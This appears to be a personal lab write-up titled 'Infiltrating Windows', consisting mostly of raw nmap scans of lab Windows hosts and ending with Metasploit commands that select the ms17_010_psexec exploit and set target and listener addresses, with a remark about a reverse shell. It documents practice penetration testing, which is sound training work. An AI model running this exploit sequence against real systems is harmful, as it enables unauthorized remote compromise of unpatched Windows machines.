Infiltrating Windows
April 28, 2024
Last updated
April 28, 2024
Last updated
# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
7/tcp open echo syn-ack
9/tcp open discard? syn-ack
13/tcp open daytime syn-ack Microsoft Windows USA daytime
17/tcp open qotd syn-ack Windows qotd (English)
19/tcp open chargen syn-ack
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsof@ syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open vmrdp? syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
| Check 3 (port 25647/udp): CLEAN (Failed to receive data)
| Check 4 (port 20860/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-27T15:48:07
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Shells-Win10
| NetBIOS computer name: SHELLS-WIN10\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-04-27T08:48:08-07:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds# Nmap 7.94 scan initiated Mon Apr 29 22:08:21 2024 as: nmap -sV -O -oN nmap-os -vv 10.129.201.97
Nmap scan report for 10.129.201.97
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2024-04-29 22:08:21 PST for 32s
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=4/29%OT=80%CT=1%CU=30926%PV=Y%DS=2%DC=I%G=Y%TM=662FA9F
OS:5%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=RD%TS=A)SEQ(SP=104%GCD=1%ISR=10C%TI=I%
OS:CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4
OS:=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2
OS:000%W5=2000%W6=2000)ECN(R=N)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.003 days (since Mon Apr 29 22:04:08 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 29 22:08:53 2024 -- 1 IP address (1 host up) scanned in 32.20 secondsHERE IS THE ANSWER
I just have to use the psexec instead of uploading a reverse shell in the web
search eternal
use 1 (exploit(windows/smb/ms17_010_psexec)
options
set rhost 10.129.201.97
set lhost 10.10.15.241
